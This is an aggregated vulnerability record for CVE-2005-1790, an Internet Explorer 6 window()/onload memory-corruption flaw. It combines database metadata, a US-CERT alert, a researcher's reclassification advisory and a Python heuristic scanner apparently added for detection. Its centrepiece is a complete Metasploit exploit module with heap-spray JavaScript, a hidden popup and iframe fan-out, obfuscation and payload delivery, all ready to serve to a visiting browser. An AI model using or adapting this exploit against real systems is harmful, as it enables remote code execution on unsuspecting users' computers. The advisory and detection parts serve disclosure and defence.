CVE-2005-1790
CVSS 2.6
Published: 2005-06-01 00:00:00
Revised: 2016-10-17 23:22:33

[Original] Microsoft Internet Explorer 6 SP2 6.0.2900.2180 and 6.0.2800.1106, and earlier versions, allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a Javascript BODY onload event that calls the window function, aka "Mismatched Document Object Model Objects Memory Corruption Vulnerability."


[CNNVD] Microsoft IE Remote Code Execution Vulnerability (CNNVD-200506-003)

        Microsoft Internet Explorer is a very popular web browser released by Microsoft.
        When used in conjunction with a BODY onload event, IE fails to correctly initialize the JavaScript "Window()" function, so Internet Explorer raises an exception when it tries to call the 32-bit address referenced in ECX:
        CALL DWORD [ECX+8]
        Because of this bug, ECX may inadvertently be populated with the Unicode representation of a text string named "OBJECT", specifically 0x006F005B. Since offset 0x006F005B points to an invalid or non-existent memory location, Internet Explorer cannot proceed and the end user experiences a denial of service.
        Although this bug does not yield control of any internal register and/or points to an offset that cannot be controlled, it may allow remote code execution under certain circumstances.

- CVSS (Base Score)

CVSS score: 2.6 [Minor (LOW)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CWE (Weakness Category)

CWE-399 [Resource Management Errors]

- CPE (Affected Platforms and Products)

cpe:/a:microsoft:ie:6.0.2900.2180  Microsoft Internet Explorer 6.0.2900.2180
cpe:/a:microsoft:ie:6.0.2800.1106  Microsoft Internet Explorer 6.0.2800.1106

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:722  Win2K/XP,SP1 IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1508  Server 2003,SP1 IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1489  Win2k,SP4 IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1303  WinXP,SP1 (64-bit) IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1299  WinXP,SP2 IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1091  Server 2003 IE Mismatched Document Object Memory Corruption Vulnerability
*OVAL describes in detail how to detect this vulnerability; you can find more technical detail on detecting it in the related OVAL definitions.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1790
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1790
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-003
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=111746394106172&w=2
(UNKNOWN)  BUGTRAQ  20050528 Microsoft Internet Explorer - Crash on JavaScript "window()"-calling (05/28/2005)
http://marc.info/?l=bugtraq&m=111755552306013&w=2
(UNKNOWN)  BUGTRAQ  20050530 Re: Microsoft Internet Explorer - Crash on JavaScript "window()"-calling (05/28/2005)
http://securitytracker.com/id?1015251
(UNKNOWN)  SECTRACK  1015251
http://support.avaya.com/elmodocs2/security/ASA-2005-234.pdf
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-234.pdf
http://www.computerterrorism.com/research/ie/ct21-11-2005
(UNKNOWN)  MISC  http://www.computerterrorism.com/research/ie/ct21-11-2005
http://www.kb.cert.org/vuls/id/887861
(UNKNOWN)  CERT-VN  VU#887861
http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx
(UNKNOWN)  MS  MS05-054
http://www.securityfocus.com/archive/1/archive/1/417326/30/0/threaded
(UNKNOWN)  BUGTRAQ  20051121 Computer Terrorism Security Advisory (Reclassification) - Microsoft Internet Explorer JavaScript Window() Vulnerability
http://www.securityfocus.com/bid/13799
(UNKNOWN)  BID  13799
http://www.us-cert.gov/cas/techalerts/TA05-347A.html
(UNKNOWN)  CERT  TA05-347A
http://www.vupen.com/english/advisories/2005/2509
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2509
http://www.vupen.com/english/advisories/2005/2867
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2867
http://www.vupen.com/english/advisories/2005/2909
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2909
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
(UNKNOWN)  MISC  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420

- Vulnerability Information

Microsoft IE Remote Code Execution Vulnerability
Low severity  Resource Management Errors
2005-06-01 00:00:00 2006-06-15 00:00:00
Remote

- Advisories and Patches

        The vendor has released an update to fix this security issue; patch download link:
        http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx

- Vulnerability Information (18365)

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability (EDBID:18365)
windows remote
2012-01-14 Verified
0 metasploit
N/A
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability',
			'Description'    => %q{
				This bug is triggered when the browser handles a JavaScript 'onLoad' handler in
				conjunction with an improperly initialized 'window()' JavaScript function.
				This exploit results in a call to an address lower than the heap. The javascript
				prompt() places our shellcode near where the call operand points to.  We call
				prompt() multiple times in separate iframes to place our return address.
				We hide the prompts in a popup window behind the main window. We spray the heap
				a second time with our shellcode and point the return address to the heap. I use
				a fairly high address to make this exploit more reliable. IE will crash when the
				exploit completes.  Also, please note that Internet Explorer must allow popups
				in order to continue exploitation.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Benjamin Tobias Franz', # Discovery
					'Stuart Pearson',        # Proof of Concept
					'Sam Sharps'             # Metasploit port
				],
			'References'     =>
				[
					['MSB', 'MS05-054'],
					['CVE', '2005-1790'],
					['OSVDB', '17094'],
					['URL', 'http://www.securityfocus.com/bid/13799/info'],
					['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'Compat'   =>
						{
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ],
					[ 'Internet Explorer 6 Windows 2000',  { 'iframes' => 8 } ],
				],
			'DisclosureDate' => 'Nov 21 2005',
			'DefaultTarget'  => 0))
	end

	def exploit
		@var_redir = rand_text_alpha(rand(100)+1)
		super
	end

	def auto_target(cli, request)
		mytarget = nil

		agent = request.headers['User-Agent']
		print_status("Checking user agent: #{agent}")

		if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/)
			mytarget = targets[0]   # IE6 on XP
		elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/)
			mytarget = targets[1]	# IE6 on 2000
		else
			print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
		end

		mytarget
	end


	def on_request_uri(cli, request)
		mytarget   = auto_target(cli, request)
		var_title  = rand_text_alpha(rand(100) + 1)
		func_main  = rand_text_alpha(rand(100) + 1)

		heapspray = ::Rex::Exploitation::JSObfu.new %Q|
function heapspray()
{
	shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
	var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
	var headersize = 20;
	var slackspace = headersize + shellcode.length;
	while (bigblock.length < slackspace) bigblock += bigblock;
	var fillblock = bigblock.substring(0,slackspace);
	var block = bigblock.substring(0,bigblock.length - slackspace);
	while (block.length + slackspace < 0x40000) block = block + block + fillblock;
	var memory = new Array();
	for (i = 0; i < 250; i++){ memory[i] = block + shellcode }

	var ret = "";
	var fillmem = "";

	for (i = 0; i < 500; i++)
		ret += unescape("%u0F0F%u0F0F");
	for (i = 0; i < 200; i++)
		fillmem += ret;

	prompt(fillmem, "");
}
|
		heapspray.obfuscate

		nofunc = ::Rex::Exploitation::JSObfu.new %Q|

if (document.location.href.indexOf("#{@var_redir}") == -1)
{
	var counter = 0;


	top.consoleRef = open('','BlankWindow',
	'width=100,height=100'
	+',menubar=0'
	+',toolbar=1'
	+',status=0'
	+',scrollbars=0'
	+',left=1'
	+',top=1'
	+',resizable=1')
	self.focus()


	for (counter = 0; counter < #{mytarget['iframes']}; counter++)
	{
		top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>');
	}
	document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");

}
else
{
	#{heapspray.sym('heapspray')}();
}
|

		nofunc.obfuscate

		main = %Q|
function #{func_main}()
{
	document.write("<TITLE>#{var_title}</TITLE>");
	document.write("<body onload=window();>");

	window.location.reload();
}
|

		html = %Q|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script>
#{nofunc}
#{heapspray}
#{main}
</script>
</head>
<body>
</body>
</html>
|

		print_status("Sending #{self.name} to client #{cli.peerhost}")
		# Transmit the compressed response to the client
		send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

		# Handle the payload
		handler(cli)
	end
end
		

- Vulnerability Information (F108617)

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution (PacketStormID:F108617)
2012-01-13 00:00:00
Benjamin Tobias Franz,Stuart Pearson,Sam Sharps  metasploit.com
exploit,javascript,shellcode
CVE-2005-1790

This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function. This exploit results in a call to an address lower than the heap. The javascript prompt() places the shellcode near where the call operand points to. The module calls prompt() multiple times in separate iframes to place our return address. The module hides the prompts in a popup window behind the main window and then it will spray the heap a second time with the shellcode and point the return address to the heap. It then uses a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation.


- Vulnerability Information (F42292)

Technical Cyber Security Alert 2005-347A (PacketStormID:F42292)
2005-12-14 00:00:00
US-CERT  us-cert.gov
advisory,remote,denial of service,arbitrary,vulnerability
CVE-2005-1790,CVE-2005-2127

Technical Cyber Security Alert TA05-347A - Microsoft has released updates that address critical vulnerabilities in Internet Explorer (IE). A remote, unauthenticated attacker could exploit these vulnerabilities to execute arbitrary code or cause a denial of service on an affected system.



            Technical Cyber Security Alert TA05-347A

           Microsoft Internet Explorer Vulnerabilities

   Original release date: December 13, 2005
   Last revised: --
   Source: US-CERT

Systems Affected

     * Microsoft Windows
     * Microsoft Internet Explorer

   For more complete information, refer to the Microsoft Security
   Bulletin Summary for December 2005.

Overview

   Microsoft has released updates that address critical vulnerabilities
   in Internet Explorer (IE). A remote, unauthenticated attacker could
   exploit these vulnerabilities to execute arbitrary code or cause a
   denial of service on an affected system.

I. Description

   The Microsoft Security Bulletins for December 2005 address
   vulnerabilities in Microsoft Windows and Internet Explorer. By
   convincing a user to view a specially crafted HTML document, such as a
   web page or an HTML email message or attachment, an attacker could
   execute arbitrary code with the privileges of the user. The attacker
   could also cause IE or the program using the WebBrowser control to
   crash.

   Further information is available in the following US-CERT
   Vulnerability Notes:

   VU#887861 - Microsoft Internet Explorer vulnerable to code execution
   via mismatched DOM objects 

   Microsoft Internet Explorer fails to properly handle requests to
   mismatched DOM objects, which may allow a remote attacker to execute
   arbitrary code on a vulnerable system.
   (CVE-2005-1790)

   VU#959049 - Several COM objects cause memory corruption in Microsoft
   Internet Explorer 

   Microsoft Internet Explorer allows instantiation of COM objects not
   designed for use in the browser, which may allow an attacker to
   execute arbitrary code or crash IE.
   (CVE-2005-2127)

II. Impact

   A remote, unauthenticated attacker exploiting these vulnerabilities
   could execute arbitrary code with the privileges of the user. If the
   user is logged on with administrative privileges, the attacker could
   take complete control of an affected system or cause a denial of
   service.

III. Solution

Apply Updates

   Microsoft has provided the updates for these and other vulnerabilities
   in the December 2005 Security Bulletins and on the Microsoft Update
   site.

Disable ActiveX

   Disable ActiveX in the Internet Zone to further protect against the
   vulnerabilities described in VU#959049 and VU#680526. Instructions for
   disabling ActiveX are available in the CERT/CC Malicious Web Scripts
   FAQ. Note that disabling ActiveX will reduce the functionality of some
   web sites.

   The updates provided by MS05-037, MS05-038, MS05-052, and MS05-054
   block COM objects known to be vulnerable, however there may be more.

Appendix A. References

     * Microsoft Security Bulletin Summary for December 2005 -
       <http://www.microsoft.com/technet/security/bulletin/ms05-dec.mspx>

     * Microsoft Security Bulletin MS05-054 -
       <http://www.microsoft.com/technet/security/bulletin/MS05-054.mspx>

     * Microsoft Security Bulletin MS05-052 -
       <http://www.microsoft.com/technet/security/bulletin/MS05-052.mspx>

     * Microsoft Security Bulletin MS05-038 -
       <http://www.microsoft.com/technet/security/bulletin/MS05-038.mspx>

     * Microsoft Security Bulletin MS05-037 -
       <http://www.microsoft.com/technet/security/bulletin/MS05-037.mspx>

     * US-CERT Vulnerability Note VU#887861 -
       <http://www.kb.cert.org/vuls/id/887861>

     * US-CERT Vulnerability Note VU#959049 -
       <http://www.kb.cert.org/vuls/id/959049>

     * US-CERT Vulnerability Note VU#680526 -
       <http://www.kb.cert.org/vuls/id/680526>

     * CVE-2005-1790 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1790>

     * CVE-2005-2127 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2127>

     * CERT/CC Malicious Web Scripts FAQ -
       <http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56>

     * Improve the safety of your browsing and e-mail activities -
       <http://www.microsoft.com/athome/security/online/browsing_safety.mspx>

     * Security Essentials -
       <http://www.microsoft.com/athome/security/protect/default.aspx>

     * Microsoft Update - <https://update.microsoft.com/microsoftupdate>

     _________________________________________________________________


   The most recent version of this document can be found at:

     <http://www.us-cert.gov/cas/techalerts/TA05-347A.html> 

     _________________________________________________________________


   Feedback can be directed to US-CERT Technical Staff. Please send
   email to <cert@cert.org> with "TA05-347A Feedback VU#887861" in the
   subject.

     _________________________________________________________________

   For instructions on subscribing to or unsubscribing from this
   mailing list, visit <http://www.us-cert.gov/cas/signup.html>. 

     _________________________________________________________________


   Produced 2005 by US-CERT, a government organization.

   Terms of use:

     <http://www.us-cert.gov/legal.html> 

     _________________________________________________________________


   Revision History

   December 13, 2005: Initial release



    

- Vulnerability Information (F41890)

poc.tgz (PacketStormID:F41890)
2005-11-30 00:00:00
Stuart Pearson  computerterrorism.com
exploit,denial of service,javascript,code execution,proof of concept
CVE-2005-1790

Proof of concept html that demonstrates the code execution flaw in the Microsoft Internet Explorer JavaScript Window() vulnerability previously considered to be simply a denial of service flaw.

- Vulnerability Information (F41889)

CT21-11-2005.txt (PacketStormID:F41889)
2005-11-30 00:00:00
Benjamin Tobias Franz  
advisory,remote,denial of service,arbitrary,javascript,code execution
CVE-2005-1790

This document serves as a reclassification advisory for the Microsoft Internet Explorer JavaScript Window() DoS vulnerability, originally reported on 31/05/2005. Contrary to popular belief, the aforementioned security issue is susceptible to remote arbitrary code execution, yielding full system access with the privileges of the underlying user.

Computer Terrorism  (UK) 
========================


Security Advisory (Reclassification) :: CT21-11-2005
-----------------------------------------------------


Title:            Microsoft Internet Explorer JavaScript Window() Vulnerability

Author:           S. Pearson
Organisation:     Computer Terrorism (UK)
Web:              www.computerterrorism.com
Advisory Date:    21st November, 2005


Software:         Microsoft Internet Explorer 5.5 & 6.x
Severity:         Critical (Elevated from low) 
Impact:           Remote System Access
Solution Status:  ** UNPATCHED **
CVE reference:    CAN-2005-1790

Credits:          Benjamin Tobias Franz  (original bug)



Overview:
---------

This document serves as a *reclassification* advisory for the Microsoft Internet Explorer JavaScript Window() DoS vulnerability, originally reported on 31/05/2005.

Contrary to popular belief, the aforementioned security issue is susceptible to remote arbitrary code execution, yielding full system access with the privileges of the underlying user.



Technical Narrative:
--------------------

As well documented, the vulnerability is instigated by IE's failure to correctly initialise the JavaScript "Window()" function when used in conjunction with a <BODY onload> event. As a result, Internet Explorer encounters an exception when trying to call a dereferenced 32bit address located in ECX, as highlighted by the following line of code:

	CALL DWORD [ECX+8]

Due to the bug, ECX is inadvertently populated by the Unicode representation of a text string named "OBJECT", or more specifically 0x006F005B. As offset 0x006F005B points to an invalid (or non-existent) memory location, Internet Explorer fails to progress, and in turn the end user experiences an application crash (DoS).

Therefore, as the bug does not yield control of any internal register and/or points to an offset of which we have no control, the original "low" risk classification clearly reflects the improbable scenario for remote code execution.


How improbable?


If we take a closer look at the vulnerability, we actually see that the instruction is trying to dereference an offset in the range of 0x00600000, which, coincidentally, is reserved for the facilitation of all opened Window characteristics on the desktop.

These structures vary in both length and content, but in the main, take the form of window titles, buttons, and any File/Edit/View menu bars attributable to a particular Window session.

Consequently, it is feasible to assume that offset 0x006F005B could be arrived at through the invocation of several new Windows structures, for example circa 12 new web browsing sessions, which would increment 0x00600000 into 0x006F005B.

If this were possible, it would just leave the problem of trying to identify a means by which custom shellcode could be inserted via one of the Window Elements, and correctly aligned against the called [0x006F005B].

Accordingly, several methods were tested. By using a combination of multiple open windows (expanding the memory section), and legal techniques that allow the modification of certain Window elements (examples below), 3rd party code execution was eventually realised!

Examples:

1.   Long HTML <TITLE>
2.   Long embedded Document File Names
3.   Large Alert Boxes


Unfortunately, all methods tested suffered from one major flaw - inconsistency.

The assumption that a potential victim has a clean desktop (no open apps), compounded by the fact that most window elements encompass some form of content length restriction, results in a very small opportunity for any realistic exploitation.

Except for one particular approach......a JavaScript prompt box.

By employing a simple technique to invoke multiple occurrences of large JavaScript prompt boxes, it is possible to flood/saturate the remoteness between 0x00600000 - 0x006F005B ++ with data of our choice, yielding very reliable execution of arbitrary code.


Proof Of Concept:
-----------------

http://www.computerterrorism.com/research/ie/poc.htm


Temporary Solution:
-------------------

Until a patch is developed users are strongly advised to disable active scripting for non-trusted sites.


Vendor Status:
--------------

The original DoS vulnerability was brought to the public's attention on 31/05/2005 by Benjamin Tobias Franz. To date, the vendor has failed to publicly acknowledge the presence of the flaw, or provide any timescales for an appropriate fix. Accordingly, as of the date of this document, this vulnerability remains UNPATCHED, affecting all users of Microsoft Internet Explorer version 5.5 and 6.x respectively.





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
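As an added defender-side example (not part of the Metasploit module in the EDB 18365 record above, the Computer Terrorism advisory, or any other record on this page), the following Python triage routine scans a captured HTML/JS document for the markers both texts describe: a <body onload> handler that calls window(), an unescape() filler consisting of one repeated byte (the module's %u0F0F%u0F0F), a prompt() whose message string is grown in a loop, and a page that re-embeds its own URL in iframes. The sample documents are constructed here, and the regexes and the "trigger-only" / "exploit-attempt" verdicts are my own heuristics, not vendor signatures.

```python
"""Static triage of HTML/JS for the CVE-2005-1790 trigger and its heap-spray scaffolding."""
import re
from dataclasses import dataclass, field
from typing import List

# <body onload=...> whose handler is a bare call to window(): the mismatched
# DOM object trigger. window.open(), window.scrollTo() and so on do not match.
TRIGGER_RE = re.compile(
    r"<body\b[^>]*\bonload\s*=\s*[\"']?\s*window\s*\(\s*\)", re.IGNORECASE)
# unescape() applied to a literal built purely from %uXXXX units.
UNESCAPE_RE = re.compile(r"unescape\(\s*[\"']((?:%u[0-9A-Fa-f]{4})+)[\"']\s*\)")
# A for-loop whose body grows a string: for (...) name += ...
GROW_RE = re.compile(r"for\s*\([^)]*\)\s*\{?\s*(\w+)\s*\+=")
# prompt(name, ...) with an identifier, not a literal, as the message text.
PROMPT_RE = re.compile(r"\bprompt\(\s*([A-Za-z_]\w*)\s*,")
# An <iframe> whose src is assembled from the page's own URL (the fan-out loop).
SELF_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*src=[\"']?\s*\+\s*document\.location\.href", re.IGNORECASE)


def decode_unescape(literal: str) -> bytes:
    """Bytes IE stores for '%uXXXX...': each unit is one UTF-16 code unit written
    little-endian, so '%u005B%u006F' is the dword 0x006F005B from the advisory."""
    units = re.findall(r"%u([0-9A-Fa-f]{4})", literal)
    return b"".join(int(u, 16).to_bytes(2, "little") for u in units)


def is_slide_constant(buf: bytes) -> bool:
    """Whole dwords made of one repeated byte: the usual spray filler, which the
    module uses (0x0F0F0F0F) as both filler and forged pointer."""
    return len(buf) >= 4 and len(buf) % 4 == 0 and len(set(buf)) == 1


@dataclass
class Triage:
    trigger: bool = False
    spray_dwords: List[int] = field(default_factory=list)
    looped_prompt: bool = False
    self_iframe: bool = False
    findings: List[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        if self.trigger and (self.spray_dwords or self.looped_prompt):
            return "exploit-attempt"  # trigger plus pointer/code placement
        if self.trigger:
            return "trigger-only"     # the original crash (DoS) report
        return "clean"


def triage(doc: str) -> Triage:
    """Score one document; findings explain the verdict to an analyst."""
    t = Triage()
    if TRIGGER_RE.search(doc):
        t.trigger = True
        t.findings.append("body onload handler calls window()")
    for lit in UNESCAPE_RE.findall(doc):
        buf = decode_unescape(lit)
        if is_slide_constant(buf):
            val = int.from_bytes(buf[:4], "little")
            t.spray_dwords.append(val)
            t.findings.append(f"unescape() filler repeats dword 0x{val:08X}")
    grown = set(GROW_RE.findall(doc))
    for name in PROMPT_RE.findall(doc):
        if name in grown:
            t.looped_prompt = True
            t.findings.append(f"prompt() shown with loop-grown string '{name}'")
    if SELF_IFRAME_RE.search(doc):
        t.self_iframe = True
        t.findings.append("page re-embeds its own URL in <iframe>s")
    return t


# Constructed sample mirroring the un-obfuscated JavaScript of the module
# above, with the shellcode line left out; not a captured page.
SAMPLE_EXPLOIT = """<html><head><script>
function heapspray() {
  var ret = ""; var fillmem = "";
  for (i = 0; i < 500; i++) ret += unescape("%u0F0F%u0F0F");
  for (i = 0; i < 200; i++) fillmem += ret;
  prompt(fillmem, "");
}
for (counter = 0; counter < 4; counter++)
  top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=x></iframe>');
function m() { document.write("<body onload=window();>"); window.location.reload(); }
</script></head><body></body></html>"""
# Constructed: the bare crash page as first reported, no spray.
SAMPLE_DOS = '<html><body onload="window()"></body></html>'
# Constructed benign page: window.* method calls and a %u literal that is text.
SAMPLE_BENIGN = """<html><body onload="window.scrollTo(0, 0); init()"><script>
var greeting = unescape("%u0048%u0069");
for (i = 0; i < 3; i++) greeting += "!";
if (confirm("Continue?")) window.open("/next", "_blank");
</script></body></html>"""

if __name__ == "__main__":
    for label, doc in (("exploit", SAMPLE_EXPLOIT), ("dos", SAMPLE_DOS), ("benign", SAMPLE_BENIGN)):
        r = triage(doc)
        print(f"{label:8s} {r.verdict:16s} {'; '.join(r.findings) or '-'}")
```

The module passes its script blocks through JSObfu's obfuscate before sending them, so literal matching like this is only a baseline: run it on the script as rendered or after deobfuscation, and treat "trigger-only" as the original DoS report rather than as benign.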
    

- Vulnerability Information

17094
Microsoft IE window() Function Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- Vulnerability Description

Internet Explorer contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue occurs when the browser does not properly handle requests to the window() object. A remote attacker could create a malicious website that uses an onload event to initialize a window() object, which may cause Internet Explorer to crash or execute arbitrary code with the privileges of the person running it.

- Timeline

2005-05-31 Unknown
2005-11-21 Unknown

- Solution

Microsoft has released a patch (MS05-054) to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): -Disable Active Scripting

- Related References

- Vulnerability Author

- Vulnerability Information

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability
Design Error 13799
Yes No
2005-05-28 12:00:00 2005-05-28 12:00:00
Discovery is credited to Benjamin Tobias Franz <0-1-2-3@gmx.de>.

- Affected Program Versions

Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Windows 2000 Advanced Server SP4
- Microsoft Windows 2000 Datacenter Server SP4
- Microsoft Windows 2000 Professional SP4
- Microsoft Windows 2000 Server SP4
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
